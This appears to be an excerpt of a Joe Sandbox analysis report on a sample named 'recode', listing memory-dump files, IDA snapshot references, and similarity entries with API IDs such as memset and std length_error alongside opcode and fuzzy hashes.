                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: ByteCharErrorLastMultiWide
                            • String ID:
                            • API String ID: 203985260-0
                            • Opcode ID: cc21509799f5a59095dc19b508f44cfeb04c6dd9da56b92675c8fa047fa0f0e3
                            • Instruction ID: c46e78fca8f00b14c4081323d59285c7ae6cc82dead08ea319c290610f36b07b
                            • Opcode Fuzzy Hash: cc21509799f5a59095dc19b508f44cfeb04c6dd9da56b92675c8fa047fa0f0e3
                            • Instruction Fuzzy Hash: 24214C72A18B8187E3109F12A54431EFBB4F788B84F580235DB8D53B95CF3DD4598B14
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: Xlength_error@std@@__std_exception_copy
                            • String ID: string too long
                            • API String ID: 127952674-2556327735
                            • Opcode ID: a36fe3bd64e8d01be716ecf1f2e41c7e1e397b6bbd99eee96c63571de0c1c45c
                            • Instruction ID: 4b2b88c4316a7a4f37a4e9fd3e212bd8cbb497edf3e3ce08e73075500ba998fb
                            • Opcode Fuzzy Hash: a36fe3bd64e8d01be716ecf1f2e41c7e1e397b6bbd99eee96c63571de0c1c45c
                            • Instruction Fuzzy Hash: 3FE03061B15A45D6EB01AF22E8901A8B364EB28B54BC88131CA5D46360EF3CA6DDC314
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: memset
                            • String ID:
                            • API String ID: 2221118986-0
                            • Opcode ID: d815b08ba6e3f4ef5a275cd9110b4b208298552b0475e124e2fa55624f721ea4
                            • Instruction ID: 0510f5d76ea63bc31efa45db93305a04c0798e319c8fcd884dbff3c5409aae59
                            • Opcode Fuzzy Hash: d815b08ba6e3f4ef5a275cd9110b4b208298552b0475e124e2fa55624f721ea4
                            • Instruction Fuzzy Hash: B8511132A14BD482D694DF2AD0412BAF366FF49B80F5C832ADE9923791DF39E058C344